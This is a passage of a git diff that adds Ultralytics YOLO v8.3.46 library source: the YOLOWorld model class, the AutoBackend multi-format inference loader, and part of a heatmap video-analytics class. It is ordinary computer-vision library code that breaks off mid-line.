"obb": { + "model": OBBModel, + "trainer": yolo.obb.OBBTrainer, + "validator": yolo.obb.OBBValidator, + "predictor": yolo.obb.OBBPredictor, + }, + } + + +class YOLOWorld(Model): + """YOLO-World object detection model.""" + + def __init__(self, model="yolov8s-world.pt", verbose=False) -> None: + """ + Initialize YOLOv8-World model with a pre-trained model file. + + Loads a YOLOv8-World model for object detection. If no custom class names are provided, it assigns default + COCO class names. + + Args: + model (str | Path): Path to the pre-trained model file. Supports *.pt and *.yaml formats. + verbose (bool): If True, prints additional information during initialization. + """ + super().__init__(model=model, task="detect", verbose=verbose) + + # Assign default COCO class names when there are no custom names + if not hasattr(self.model, "names"): + self.model.names = yaml_load(ROOT / "cfg/datasets/coco8.yaml").get("names") + + @property + def task_map(self): + """Map head to model, validator, and predictor classes.""" + return { + "detect": { + "model": WorldModel, + "validator": yolo.detect.DetectionValidator, + "predictor": yolo.detect.DetectionPredictor, + "trainer": yolo.world.WorldTrainer, + } + } + + def set_classes(self, classes): + """ + Set classes. + + Args: + classes (List(str)): A list of categories i.e. ["person"]. + """ + self.model.set_classes(classes) + # Remove background if it's given + background = " " + if background in classes: + classes.remove(background) + self.model.names = classes + + # Reset method class names + # self.predictor = None # reset predictor otherwise old names remain + if self.predictor: + self.predictor.model.names = classes diff --git a/2024.ultralytics/v8.3.46/nn/autobackend.py b/2024.ultralytics/v8.3.46/nn/autobackend.py new file mode 100644 index 0000000..b6df375 --- /dev/null +++ b/2024.ultralytics/v8.3.46/nn/autobackend.py @@ -0,0 +1,767 @@ +# Ultralytics YOLO 🚀, AGPL-3.0 license + +import ast +import json +import platform +import zipfile +from collections import OrderedDict, namedtuple +from pathlib import Path + +import cv2 +import numpy as np +import torch +import torch.nn as nn +from PIL import Image + +from ultralytics.utils import ARM64, IS_JETSON, IS_RASPBERRYPI, LINUX, LOGGER, ROOT, yaml_load +from ultralytics.utils.checks import check_requirements, check_suffix, check_version, check_yaml +from ultralytics.utils.downloads import attempt_download_asset, is_url + + +def check_class_names(names): + """ + Check class names. + + Map imagenet class codes to human-readable names if required. Convert lists to dicts. + """ + if isinstance(names, list): # names is a list + names = dict(enumerate(names)) # convert to dict + if isinstance(names, dict): + # Convert 1) string keys to int, i.e. '0' to 0, and non-string values to strings, i.e. True to 'True' + names = {int(k): str(v) for k, v in names.items()} + n = len(names) + if max(names.keys()) >= n: + raise KeyError( + f"{n}-class dataset requires class indices 0-{n - 1}, but you have invalid class indices " + f"{min(names.keys())}-{max(names.keys())} defined in your dataset YAML." + ) + if isinstance(names[0], str) and names[0].startswith("n0"): # imagenet class codes, i.e. 'n01440764' + names_map = yaml_load(ROOT / "cfg/datasets/ImageNet.yaml")["map"] # human-readable names + names = {k: names_map[v] for k, v in names.items()} + return names + + +def default_class_names(data=None): + """Applies default class names to an input YAML file or returns numerical class names.""" + if data: + try: + return yaml_load(check_yaml(data))["names"] + except Exception: + pass + return {i: f"class{i}" for i in range(999)} # return default if above errors + + +class AutoBackend(nn.Module): + """ + Handles dynamic backend selection for running inference using Ultralytics YOLO models. + + The AutoBackend class is designed to provide an abstraction layer for various inference engines. It supports a wide + range of formats, each with specific naming conventions as outlined below: + + Supported Formats and Naming Conventions: + | Format | File Suffix | + |-----------------------|-------------------| + | PyTorch | *.pt | + | TorchScript | *.torchscript | + | ONNX Runtime | *.onnx | + | ONNX OpenCV DNN | *.onnx (dnn=True) | + | OpenVINO | *openvino_model/ | + | CoreML | *.mlpackage | + | TensorRT | *.engine | + | TensorFlow SavedModel | *_saved_model/ | + | TensorFlow GraphDef | *.pb | + | TensorFlow Lite | *.tflite | + | TensorFlow Edge TPU | *_edgetpu.tflite | + | PaddlePaddle | *_paddle_model/ | + | MNN | *.mnn | + | NCNN | *_ncnn_model/ | + + This class offers dynamic backend switching capabilities based on the input model format, making it easier to deploy + models across various platforms. + """ + + @torch.no_grad() + def __init__( + self, + weights="yolo11n.pt", + device=torch.device("cpu"), + dnn=False, + data=None, + fp16=False, + batch=1, + fuse=True, + verbose=True, + ): + """ + Initialize the AutoBackend for inference. + + Args: + weights (str | torch.nn.Module): Path to the model weights file or a module instance. Defaults to 'yolo11n.pt'. + device (torch.device): Device to run the model on. Defaults to CPU. + dnn (bool): Use OpenCV DNN module for ONNX inference. Defaults to False. + data (str | Path | optional): Path to the additional data.yaml file containing class names. Optional. + fp16 (bool): Enable half-precision inference. Supported only on specific backends. Defaults to False. + batch (int): Batch-size to assume for inference. + fuse (bool): Fuse Conv2D + BatchNorm layers for optimization. Defaults to True. + verbose (bool): Enable verbose logging. Defaults to True. + """ + super().__init__() + w = str(weights[0] if isinstance(weights, list) else weights) + nn_module = isinstance(weights, torch.nn.Module) + ( + pt, + jit, + onnx, + xml, + engine, + coreml, + saved_model, + pb, + tflite, + edgetpu, + tfjs, + paddle, + mnn, + ncnn, + imx, + triton, + ) = self._model_type(w) + fp16 &= pt or jit or onnx or xml or engine or nn_module or triton # FP16 + nhwc = coreml or saved_model or pb or tflite or edgetpu # BHWC formats (vs torch BCWH) + stride = 32 # default stride + model, metadata, task = None, None, None + + # Set device + cuda = torch.cuda.is_available() and device.type != "cpu" # use CUDA + if cuda and not any([nn_module, pt, jit, engine, onnx]): # GPU dataloader formats + device = torch.device("cpu") + cuda = False + + # Download if not local + if not (pt or triton or nn_module): + w = attempt_download_asset(w) + + # In-memory PyTorch model + if nn_module: + model = weights.to(device) + if fuse: + model = model.fuse(verbose=verbose) + if hasattr(model, "kpt_shape"): + kpt_shape = model.kpt_shape # pose-only + stride = max(int(model.stride.max()), 32) # model stride + names = model.module.names if hasattr(model, "module") else model.names # get class names + model.half() if fp16 else model.float() + self.model = model # explicitly assign for to(), cpu(), cuda(), half() + pt = True + + # PyTorch + elif pt: + from ultralytics.nn.tasks import attempt_load_weights + + model = attempt_load_weights( + weights if isinstance(weights, list) else w, device=device, inplace=True, fuse=fuse + ) + if hasattr(model, "kpt_shape"): + kpt_shape = model.kpt_shape # pose-only + stride = max(int(model.stride.max()), 32) # model stride + names = model.module.names if hasattr(model, "module") else model.names # get class names + model.half() if fp16 else model.float() + self.model = model # explicitly assign for to(), cpu(), cuda(), half() + + # TorchScript + elif jit: + LOGGER.info(f"Loading {w} for TorchScript inference...") + extra_files = {"config.txt": ""} # model metadata + model = torch.jit.load(w, _extra_files=extra_files, map_location=device) + model.half() if fp16 else model.float() + if extra_files["config.txt"]: # load metadata dict + metadata = json.loads(extra_files["config.txt"], object_hook=lambda x: dict(x.items())) + + # ONNX OpenCV DNN + elif dnn: + LOGGER.info(f"Loading {w} for ONNX OpenCV DNN inference...") + check_requirements("opencv-python>=4.5.4") + net = cv2.dnn.readNetFromONNX(w) + + # ONNX Runtime and IMX + elif onnx or imx: + LOGGER.info(f"Loading {w} for ONNX Runtime inference...") + check_requirements(("onnx", "onnxruntime-gpu" if cuda else "onnxruntime")) + if IS_RASPBERRYPI or IS_JETSON: + # Fix 'numpy.linalg._umath_linalg' has no attribute '_ilp64' for TF SavedModel on RPi and Jetson + check_requirements("numpy==1.23.5") + import onnxruntime + + providers = onnxruntime.get_available_providers() + if not cuda and "CUDAExecutionProvider" in providers: + providers.remove("CUDAExecutionProvider") + elif cuda and "CUDAExecutionProvider" not in providers: + LOGGER.warning("WARNING ⚠️ Failed to start ONNX Runtime session with CUDA. Falling back to CPU...") + device = torch.device("cpu") + cuda = False + LOGGER.info(f"Preferring ONNX Runtime {providers[0]}") + if onnx: + session = onnxruntime.InferenceSession(w, providers=providers) + else: + check_requirements( + ["model-compression-toolkit==2.1.1", "sony-custom-layers[torch]==0.2.0", "onnxruntime-extensions"] + ) + w = next(Path(w).glob("*.onnx")) + LOGGER.info(f"Loading {w} for ONNX IMX inference...") + import mct_quantizers as mctq + from sony_custom_layers.pytorch.object_detection import nms_ort # noqa + + session = onnxruntime.InferenceSession( + w, mctq.get_ort_session_options(), providers=["CPUExecutionProvider"] + ) + task = "detect" + + output_names = [x.name for x in session.get_outputs()] + metadata = session.get_modelmeta().custom_metadata_map + dynamic = isinstance(session.get_outputs()[0].shape[0], str) + if not dynamic: + io = session.io_binding() + bindings = [] + for output in session.get_outputs(): + y_tensor = torch.empty(output.shape, dtype=torch.float16 if fp16 else torch.float32).to(device) + io.bind_output( + name=output.name, + device_type=device.type, + device_id=device.index if cuda else 0, + element_type=np.float16 if fp16 else np.float32, + shape=tuple(y_tensor.shape), + buffer_ptr=y_tensor.data_ptr(), + ) + bindings.append(y_tensor) + + # OpenVINO + elif xml: + LOGGER.info(f"Loading {w} for OpenVINO inference...") + check_requirements("openvino>=2024.0.0") + import openvino as ov + + core = ov.Core() + w = Path(w) + if not w.is_file(): # if not *.xml + w = next(w.glob("*.xml")) # get *.xml file from *_openvino_model dir + ov_model = core.read_model(model=str(w), weights=w.with_suffix(".bin")) + if ov_model.get_parameters()[0].get_layout().empty: + ov_model.get_parameters()[0].set_layout(ov.Layout("NCHW")) + + # OpenVINO inference modes are 'LATENCY', 'THROUGHPUT' (not recommended), or 'CUMULATIVE_THROUGHPUT' + inference_mode = "CUMULATIVE_THROUGHPUT" if batch > 1 else "LATENCY" + LOGGER.info(f"Using OpenVINO {inference_mode} mode for batch={batch} inference...") + ov_compiled_model = core.compile_model( + ov_model, + device_name="AUTO", # AUTO selects best available device, do not modify + config={"PERFORMANCE_HINT": inference_mode}, + ) + input_name = ov_compiled_model.input().get_any_name() + metadata = w.parent / "metadata.yaml" + + # TensorRT + elif engine: + LOGGER.info(f"Loading {w} for TensorRT inference...") + try: + import tensorrt as trt # noqa https://developer.nvidia.com/nvidia-tensorrt-download + except ImportError: + if LINUX: + check_requirements("tensorrt>7.0.0,!=10.1.0") + import tensorrt as trt # noqa + check_version(trt.__version__, ">=7.0.0", hard=True) + check_version(trt.__version__, "!=10.1.0", msg="https://github.com/ultralytics/ultralytics/pull/14239") + if device.type == "cpu": + device = torch.device("cuda:0") + Binding = namedtuple("Binding", ("name", "dtype", "shape", "data", "ptr")) + logger = trt.Logger(trt.Logger.INFO) + # Read file + with open(w, "rb") as f, trt.Runtime(logger) as runtime: + try: + meta_len = int.from_bytes(f.read(4), byteorder="little") # read metadata length + metadata = json.loads(f.read(meta_len).decode("utf-8")) # read metadata + except UnicodeDecodeError: + f.seek(0) # engine file may lack embedded Ultralytics metadata + model = runtime.deserialize_cuda_engine(f.read()) # read engine + + # Model context + try: + context = model.create_execution_context() + except Exception as e: # model is None + LOGGER.error(f"ERROR: TensorRT model exported with a different version than {trt.__version__}\n") + raise e + + bindings = OrderedDict() + output_names = [] + fp16 = False # default updated below + dynamic = False + is_trt10 = not hasattr(model, "num_bindings") + num = range(model.num_io_tensors) if is_trt10 else range(model.num_bindings) + for i in num: + if is_trt10: + name = model.get_tensor_name(i) + dtype = trt.nptype(model.get_tensor_dtype(name)) + is_input = model.get_tensor_mode(name) == trt.TensorIOMode.INPUT + if is_input: + if -1 in tuple(model.get_tensor_shape(name)): + dynamic = True + context.set_input_shape(name, tuple(model.get_tensor_profile_shape(name, 0)[1])) + if dtype == np.float16: + fp16 = True + else: + output_names.append(name) + shape = tuple(context.get_tensor_shape(name)) + else: # TensorRT < 10.0 + name = model.get_binding_name(i) + dtype = trt.nptype(model.get_binding_dtype(i)) + is_input = model.binding_is_input(i) + if model.binding_is_input(i): + if -1 in tuple(model.get_binding_shape(i)): # dynamic + dynamic = True + context.set_binding_shape(i, tuple(model.get_profile_shape(0, i)[1])) + if dtype == np.float16: + fp16 = True + else: + output_names.append(name) + shape = tuple(context.get_binding_shape(i)) + im = torch.from_numpy(np.empty(shape, dtype=dtype)).to(device) + bindings[name] = Binding(name, dtype, shape, im, int(im.data_ptr())) + binding_addrs = OrderedDict((n, d.ptr) for n, d in bindings.items()) + batch_size = bindings["images"].shape[0] # if dynamic, this is instead max batch size + + # CoreML + elif coreml: + LOGGER.info(f"Loading {w} for CoreML inference...") + import coremltools as ct + + model = ct.models.MLModel(w) + metadata = dict(model.user_defined_metadata) + + # TF SavedModel + elif saved_model: + LOGGER.info(f"Loading {w} for TensorFlow SavedModel inference...") + import tensorflow as tf + + keras = False # assume TF1 saved_model + model = tf.keras.models.load_model(w) if keras else tf.saved_model.load(w) + metadata = Path(w) / "metadata.yaml" + + # TF GraphDef + elif pb: # https://www.tensorflow.org/guide/migrate#a_graphpb_or_graphpbtxt + LOGGER.info(f"Loading {w} for TensorFlow GraphDef inference...") + import tensorflow as tf + + from ultralytics.engine.exporter import gd_outputs + + def wrap_frozen_graph(gd, inputs, outputs): + """Wrap frozen graphs for deployment.""" + x = tf.compat.v1.wrap_function(lambda: tf.compat.v1.import_graph_def(gd, name=""), []) # wrapped + ge = x.graph.as_graph_element + return x.prune(tf.nest.map_structure(ge, inputs), tf.nest.map_structure(ge, outputs)) + + gd = tf.Graph().as_graph_def() # TF GraphDef + with open(w, "rb") as f: + gd.ParseFromString(f.read()) + frozen_func = wrap_frozen_graph(gd, inputs="x:0", outputs=gd_outputs(gd)) + try: # find metadata in SavedModel alongside GraphDef + metadata = next(Path(w).resolve().parent.rglob(f"{Path(w).stem}_saved_model*/metadata.yaml")) + except StopIteration: + pass + + # TFLite or TFLite Edge TPU + elif tflite or edgetpu: # https://www.tensorflow.org/lite/guide/python#install_tensorflow_lite_for_python + try: # https://coral.ai/docs/edgetpu/tflite-python/#update-existing-tf-lite-code-for-the-edge-tpu + from tflite_runtime.interpreter import Interpreter, load_delegate + except ImportError: + import tensorflow as tf + + Interpreter, load_delegate = tf.lite.Interpreter, tf.lite.experimental.load_delegate + if edgetpu: # TF Edge TPU https://coral.ai/software/#edgetpu-runtime + device = device[3:] if str(device).startswith("tpu") else ":0" + LOGGER.info(f"Loading {w} on device {device[1:]} for TensorFlow Lite Edge TPU inference...") + delegate = {"Linux": "libedgetpu.so.1", "Darwin": "libedgetpu.1.dylib", "Windows": "edgetpu.dll"}[ + platform.system() + ] + interpreter = Interpreter( + model_path=w, + experimental_delegates=[load_delegate(delegate, options={"device": device})], + ) + device = "cpu" # Required, otherwise PyTorch will try to use the wrong device + else: # TFLite + LOGGER.info(f"Loading {w} for TensorFlow Lite inference...") + interpreter = Interpreter(model_path=w) # load TFLite model + interpreter.allocate_tensors() # allocate + input_details = interpreter.get_input_details() # inputs + output_details = interpreter.get_output_details() # outputs + # Load metadata + try: + with zipfile.ZipFile(w, "r") as model: + meta_file = model.namelist()[0] + metadata = ast.literal_eval(model.read(meta_file).decode("utf-8")) + except zipfile.BadZipFile: + pass + + # TF.js + elif tfjs: + raise NotImplementedError("YOLOv8 TF.js inference is not currently supported.") + + # PaddlePaddle + elif paddle: + LOGGER.info(f"Loading {w} for PaddlePaddle inference...") + check_requirements("paddlepaddle-gpu" if cuda else "paddlepaddle") + import paddle.inference as pdi # noqa + + w = Path(w) + if not w.is_file(): # if not *.pdmodel + w = next(w.rglob("*.pdmodel")) # get *.pdmodel file from *_paddle_model dir + config = pdi.Config(str(w), str(w.with_suffix(".pdiparams"))) + if cuda: + config.enable_use_gpu(memory_pool_init_size_mb=2048, device_id=0) + predictor = pdi.create_predictor(config) + input_handle = predictor.get_input_handle(predictor.get_input_names()[0]) + output_names = predictor.get_output_names() + metadata = w.parents[1] / "metadata.yaml" + + # MNN + elif mnn: + LOGGER.info(f"Loading {w} for MNN inference...") + check_requirements("MNN") # requires MNN + import os + + import MNN + + config = {} + config["precision"] = "low" + config["backend"] = "CPU" + config["numThread"] = (os.cpu_count() + 1) // 2 + rt = MNN.nn.create_runtime_manager((config,)) + net = MNN.nn.load_module_from_file(w, [], [], runtime_manager=rt, rearrange=True) + + def torch_to_mnn(x): + return MNN.expr.const(x.data_ptr(), x.shape) + + metadata = json.loads(net.get_info()["bizCode"]) + + # NCNN + elif ncnn: + LOGGER.info(f"Loading {w} for NCNN inference...") + check_requirements("git+https://github.com/Tencent/ncnn.git" if ARM64 else "ncnn") # requires NCNN + import ncnn as pyncnn + + net = pyncnn.Net() + net.opt.use_vulkan_compute = cuda + w = Path(w) + if not w.is_file(): # if not *.param + w = next(w.glob("*.param")) # get *.param file from *_ncnn_model dir + net.load_param(str(w)) + net.load_model(str(w.with_suffix(".bin"))) + metadata = w.parent / "metadata.yaml" + + # NVIDIA Triton Inference Server + elif triton: + check_requirements("tritonclient[all]") + from ultralytics.utils.triton import TritonRemoteModel + + model = TritonRemoteModel(w) + metadata = model.metadata + + # Any other format (unsupported) + else: + from ultralytics.engine.exporter import export_formats + + raise TypeError( + f"model='{w}' is not a supported model format. Ultralytics supports: {export_formats()['Format']}\n" + f"See https://docs.ultralytics.com/modes/predict for help." + ) + + # Load external metadata YAML + if isinstance(metadata, (str, Path)) and Path(metadata).exists(): + metadata = yaml_load(metadata) + if metadata and isinstance(metadata, dict): + for k, v in metadata.items(): + if k in {"stride", "batch"}: + metadata[k] = int(v) + elif k in {"imgsz", "names", "kpt_shape"} and isinstance(v, str): + metadata[k] = eval(v) + stride = metadata["stride"] + task = metadata["task"] + batch = metadata["batch"] + imgsz = metadata["imgsz"] + names = metadata["names"] + kpt_shape = metadata.get("kpt_shape") + elif not (pt or triton or nn_module): + LOGGER.warning(f"WARNING ⚠️ Metadata not found for 'model={weights}'") + + # Check names + if "names" not in locals(): # names missing + names = default_class_names(data) + names = check_class_names(names) + + # Disable gradients + if pt: + for p in model.parameters(): + p.requires_grad = False + + self.__dict__.update(locals()) # assign all variables to self + + def forward(self, im, augment=False, visualize=False, embed=None): + """ + Runs inference on the YOLOv8 MultiBackend model. + + Args: + im (torch.Tensor): The image tensor to perform inference on. + augment (bool): whether to perform data augmentation during inference, defaults to False + visualize (bool): whether to visualize the output predictions, defaults to False + embed (list, optional): A list of feature vectors/embeddings to return. + + Returns: + (tuple): Tuple containing the raw output tensor, and processed output for visualization (if visualize=True) + """ + b, ch, h, w = im.shape # batch, channel, height, width + if self.fp16 and im.dtype != torch.float16: + im = im.half() # to FP16 + if self.nhwc: + im = im.permute(0, 2, 3, 1) # torch BCHW to numpy BHWC shape(1,320,192,3) + + # PyTorch + if self.pt or self.nn_module: + y = self.model(im, augment=augment, visualize=visualize, embed=embed) + + # TorchScript + elif self.jit: + y = self.model(im) + + # ONNX OpenCV DNN + elif self.dnn: + im = im.cpu().numpy() # torch to numpy + self.net.setInput(im) + y = self.net.forward() + + # ONNX Runtime + elif self.onnx or self.imx: + if self.dynamic: + im = im.cpu().numpy() # torch to numpy + y = self.session.run(self.output_names, {self.session.get_inputs()[0].name: im}) + else: + if not self.cuda: + im = im.cpu() + self.io.bind_input( + name="images", + device_type=im.device.type, + device_id=im.device.index if im.device.type == "cuda" else 0, + element_type=np.float16 if self.fp16 else np.float32, + shape=tuple(im.shape), + buffer_ptr=im.data_ptr(), + ) + self.session.run_with_iobinding(self.io) + y = self.bindings + if self.imx: + # boxes, conf, cls + y = np.concatenate([y[0], y[1][:, :, None], y[2][:, :, None]], axis=-1) + + # OpenVINO + elif self.xml: + im = im.cpu().numpy() # FP32 + + if self.inference_mode in {"THROUGHPUT", "CUMULATIVE_THROUGHPUT"}: # optimized for larger batch-sizes + n = im.shape[0] # number of images in batch + results = [None] * n # preallocate list with None to match the number of images + + def callback(request, userdata): + """Places result in preallocated list using userdata index.""" + results[userdata] = request.results + + # Create AsyncInferQueue, set the callback and start asynchronous inference for each input image + async_queue = self.ov.runtime.AsyncInferQueue(self.ov_compiled_model) + async_queue.set_callback(callback) + for i in range(n): + # Start async inference with userdata=i to specify the position in results list + async_queue.start_async(inputs={self.input_name: im[i : i + 1]}, userdata=i) # keep image as BCHW + async_queue.wait_all() # wait for all inference requests to complete + y = np.concatenate([list(r.values())[0] for r in results]) + + else: # inference_mode = "LATENCY", optimized for fastest first result at batch-size 1 + y = list(self.ov_compiled_model(im).values()) + + # TensorRT + elif self.engine: + if self.dynamic and im.shape != self.bindings["images"].shape: + if self.is_trt10: + self.context.set_input_shape("images", im.shape) + self.bindings["images"] = self.bindings["images"]._replace(shape=im.shape) + for name in self.output_names: + self.bindings[name].data.resize_(tuple(self.context.get_tensor_shape(name))) + else: + i = self.model.get_binding_index("images") + self.context.set_binding_shape(i, im.shape) + self.bindings["images"] = self.bindings["images"]._replace(shape=im.shape) + for name in self.output_names: + i = self.model.get_binding_index(name) + self.bindings[name].data.resize_(tuple(self.context.get_binding_shape(i))) + + s = self.bindings["images"].shape + assert im.shape == s, f"input size {im.shape} {'>' if self.dynamic else 'not equal to'} max model size {s}" + self.binding_addrs["images"] = int(im.data_ptr()) + self.context.execute_v2(list(self.binding_addrs.values())) + y = [self.bindings[x].data for x in sorted(self.output_names)] + + # CoreML + elif self.coreml: + im = im[0].cpu().numpy() + im_pil = Image.fromarray((im * 255).astype("uint8")) + # im = im.resize((192, 320), Image.BILINEAR) + y = self.model.predict({"image": im_pil}) # coordinates are xywh normalized + if "confidence" in y: + raise TypeError( + "Ultralytics only supports inference of non-pipelined CoreML models exported with " + f"'nms=False', but 'model={w}' has an NMS pipeline created by an 'nms=True' export." + ) + # TODO: CoreML NMS inference handling + # from ultralytics.utils.ops import xywh2xyxy + # box = xywh2xyxy(y['coordinates'] * [[w, h, w, h]]) # xyxy pixels + # conf, cls = y['confidence'].max(1), y['confidence'].argmax(1).astype(np.float32) + # y = np.concatenate((box, conf.reshape(-1, 1), cls.reshape(-1, 1)), 1) + elif len(y) == 1: # classification model + y = list(y.values()) + elif len(y) == 2: # segmentation model + y = list(reversed(y.values())) # reversed for segmentation models (pred, proto) + + # PaddlePaddle + elif self.paddle: + im = im.cpu().numpy().astype(np.float32) + self.input_handle.copy_from_cpu(im) + self.predictor.run() + y = [self.predictor.get_output_handle(x).copy_to_cpu() for x in self.output_names] + + # MNN + elif self.mnn: + input_var = self.torch_to_mnn(im) + output_var = self.net.onForward([input_var]) + y = [x.read() for x in output_var] + + # NCNN + elif self.ncnn: + mat_in = self.pyncnn.Mat(im[0].cpu().numpy()) + with self.net.create_extractor() as ex: + ex.input(self.net.input_names()[0], mat_in) + # WARNING: 'output_names' sorted as a temporary fix for https://github.com/pnnx/pnnx/issues/130 + y = [np.array(ex.extract(x)[1])[None] for x in sorted(self.net.output_names())] + + # NVIDIA Triton Inference Server + elif self.triton: + im = im.cpu().numpy() # torch to numpy + y = self.model(im) + + # TensorFlow (SavedModel, GraphDef, Lite, Edge TPU) + else: + im = im.cpu().numpy() + if self.saved_model: # SavedModel + y = self.model(im, training=False) if self.keras else self.model(im) + if not isinstance(y, list): + y = [y] + elif self.pb: # GraphDef + y = self.frozen_func(x=self.tf.constant(im)) + else: # Lite or Edge TPU + details = self.input_details[0] + is_int = details["dtype"] in {np.int8, np.int16} # is TFLite quantized int8 or int16 model + if is_int: + scale, zero_point = details["quantization"] + im = (im / scale + zero_point).astype(details["dtype"]) # de-scale + self.interpreter.set_tensor(details["index"], im) + self.interpreter.invoke() + y = [] + for output in self.output_details: + x = self.interpreter.get_tensor(output["index"]) + if is_int: + scale, zero_point = output["quantization"] + x = (x.astype(np.float32) - zero_point) * scale # re-scale + if x.ndim == 3: # if task is not classification, excluding masks (ndim=4) as well + # Denormalize xywh by image size. See https://github.com/ultralytics/ultralytics/pull/1695 + # xywh are normalized in TFLite/EdgeTPU to mitigate quantization error of integer models + if x.shape[-1] == 6: # end-to-end model + x[:, :, [0, 2]] *= w + x[:, :, [1, 3]] *= h + else: + x[:, [0, 2]] *= w + x[:, [1, 3]] *= h + if self.task == "pose": + x[:, 5::3] *= w + x[:, 6::3] *= h + y.append(x) + # TF segment fixes: export is reversed vs ONNX export and protos are transposed + if len(y) == 2: # segment with (det, proto) output order reversed + if len(y[1].shape) != 4: + y = list(reversed(y)) # should be y = (1, 116, 8400), (1, 160, 160, 32) + if y[1].shape[-1] == 6: # end-to-end model + y = [y[1]] + else: + y[1] = np.transpose(y[1], (0, 3, 1, 2)) # should be y = (1, 116, 8400), (1, 32, 160, 160) + y = [x if isinstance(x, np.ndarray) else x.numpy() for x in y] + + # for x in y: + # print(type(x), len(x)) if isinstance(x, (list, tuple)) else print(type(x), x.shape) # debug shapes + if isinstance(y, (list, tuple)): + if len(self.names) == 999 and (self.task == "segment" or len(y) == 2): # segments and names not defined + nc = y[0].shape[1] - y[1].shape[1] - 4 # y = (1, 32, 160, 160), (1, 116, 8400) + self.names = {i: f"class{i}" for i in range(nc)} + return self.from_numpy(y[0]) if len(y) == 1 else [self.from_numpy(x) for x in y] + else: + return self.from_numpy(y) + + def from_numpy(self, x): + """ + Convert a numpy array to a tensor. + + Args: + x (np.ndarray): The array to be converted. + + Returns: + (torch.Tensor): The converted tensor + """ + return torch.tensor(x).to(self.device) if isinstance(x, np.ndarray) else x + + def warmup(self, imgsz=(1, 3, 640, 640)): + """ + Warm up the model by running one forward pass with a dummy input. + + Args: + imgsz (tuple): The shape of the dummy input tensor in the format (batch_size, channels, height, width) + """ + import torchvision # noqa (import here so torchvision import time not recorded in postprocess time) + + warmup_types = self.pt, self.jit, self.onnx, self.engine, self.saved_model, self.pb, self.triton, self.nn_module + if any(warmup_types) and (self.device.type != "cpu" or self.triton): + im = torch.empty(*imgsz, dtype=torch.half if self.fp16 else torch.float, device=self.device) # input + for _ in range(2 if self.jit else 1): + self.forward(im) # warmup + + @staticmethod + def _model_type(p="path/to/model.pt"): + """ + Takes a path to a model file and returns the model type. Possibles types are pt, jit, onnx, xml, engine, coreml, + saved_model, pb, tflite, edgetpu, tfjs, ncnn or paddle. + + Args: + p: path to the model file. Defaults to path/to/model.pt + + Examples: + >>> model = AutoBackend(weights="path/to/model.onnx") + >>> model_type = model._model_type() # returns "onnx" + """ + from ultralytics.engine.exporter import export_formats + + sf = export_formats()["Suffix"] # export suffixes + if not is_url(p) and not isinstance(p, str): + check_suffix(p, sf) # checks + name = Path(p).name + types = [s in name for s in sf] + types[5] |= name.endswith(".mlmodel") # retain support for older Apple CoreML *.mlmodel formats + types[8] &= not types[9] # tflite &= not edgetpu + if any(types): + triton = False + else: + from urllib.parse import urlsplit + + url = urlsplit(p) + triton = bool(url.netloc) and bool(url.path) and url.scheme in {"http", "grpc"} + + return types + [triton] diff --git a/2024.ultralytics/v8.3.46/solutions/heatmap.py b/2024.ultralytics/v8.3.46/solutions/heatmap.py new file mode 100644 index 0000000..bf2903b --- /dev/null +++ b/2024.ultralytics/v8.3.46/solutions/heatmap.py @@ -0,0 +1,126 @@ +# Ultralytics YOLO 🚀, AGPL-3.0 license + +import cv2 +import numpy as np + +from ultralytics.solutions.object_counter import ObjectCounter +from ultralytics.utils.plotting import Annotator + + +class Heatmap(ObjectCounter): + """ + A class to draw heatmaps in real-time video streams based on object tracks. + + This class extends the ObjectCounter class to generate and visualize heatmaps of object movements in video + streams. It uses tracked object positions to create a cumulative heatmap effect over time. + + Attributes: + initialized (bool): Flag indicating whether the heatmap has been initialized. + colormap (int): OpenCV colormap used for heatmap visualization. + heatmap (np.ndarray): Array storing the cumulative heatmap data. + annotator (Annotator): Object for drawing annotations on the image. + + Methods: + heatmap_effect: Calculates and updates the heatmap effect for a given bounding box. + generate_heatmap: Generates and applies the heatmap effect to each frame. + + Examples: + >>> from ultralytics.solutions import Heatmap + >>> heatmap = Heatmap(model="yolov8n.pt", colormap=cv2.COLORMAP_JET) + >>> frame = cv2.imread("frame.jpg") + >>> processed_frame = heatmap.generate_heatmap(frame) + """ + + def __init__(self, **kwargs): + """Initializes the Heatmap class for real-time video stream heatmap generation based on object tracks.""" + super().__init__(**kwargs) + + self.initialized = False # bool variable for heatmap initialization + if self.region is not None: # check if user provided the region coordinates + self.initialize_region() + + # store colormap + self.colormap = cv2.COLORMAP_PARULA if self.CFG["colormap"] is None else self.CFG["colormap"] + + def heatmap_effect(self, box): + """ + Efficiently calculates heatmap area and effect location for applying colormap. + + Args: + box (List[float]): Bounding box coordinates [x0, y0, x1, y1]. + + Examples: + >>> heatmap = Heatmap() + >>> box = [100, 100, 200, 200] + >>> heatmap.heatmap_effect(box) + """ + x0, y0, x1, y1 = map(int, box) + radius_squared = (min(x1 - x0, y1 - y0) // 2) ** 2 + + # Create a meshgrid with region of interest (ROI) for vectorized distance calculations + xv, yv = np.meshgrid(np.arange(x0, x1), np.arange(y0, y1)) + + # Calculate squared distances from the center + dist_squared = (xv - ((x0 + x1) // 2)) ** 2 + (yv - ((y0 + y1) // 2)) ** 2 + + # Create a mask of points within the radius + within_radius = dist_squared <= radius_squared + + # Update only the values within the bounding box in a single vectorized operation + self.heatmap[y0:y1, x0:x1][within_radius] += 2 + + def generate_heatmap(self, im0): + """ + Generate heatmap for each frame using Ultralytics. + + Args: + im0 (np.ndarray): Input image array for processing. + + Returns: + (np.ndarray): Processed image with heatmap overlay and object counts (if region is specified). + + Examples: + >>> heatmap = Heatmap() + >>> im0 = cv2.imread("image.jpg") + >>> result = heatmap.generate_heatmap(im0) + """ + if not self.initialized: + self.heatmap = np.zeros_like(im0, dtype=np.float32) * 0.99 + self.initialized = True # Initialize heatmap only once + + self.annotator = Annotator(im0, line_width=self.line_width) # Initialize annotator + self.extract_tracks(im0) # Extract tracks + + # Iterate over bounding boxes, track ids and classes index + for box, track_id, cls in zip(self.boxes, self.track_ids, self.clss): + # Draw bounding box and counting region + self.heatmap_effect(box) + + if self.region is not None: + self.annotator.draw_region(reg_pts=self.region, color=(104, 0, 123), thickness=self.line_width * 2) + self.store_tracking_history(track_id, box) # Store track history + self.store_classwise_counts(cls) # store classwise counts in dict + current_centroid = ((box[0] + box[2]) / 2, (box[1] + box[3]) / 2) + # Store tracking previous position and perform object counting + prev_position = None + if len(self.track_history[track_id]) > 1: + prev_position = self.track_history[track_id][-2] + self.count_objects(current_centroid, track_id, prev_position, cls) # Perform object counting + + if self.region is not None: + self.display_counts(im0) # Display the counts on the frame + + # Normalize, apply colormap to heatmap and combine with original image + if 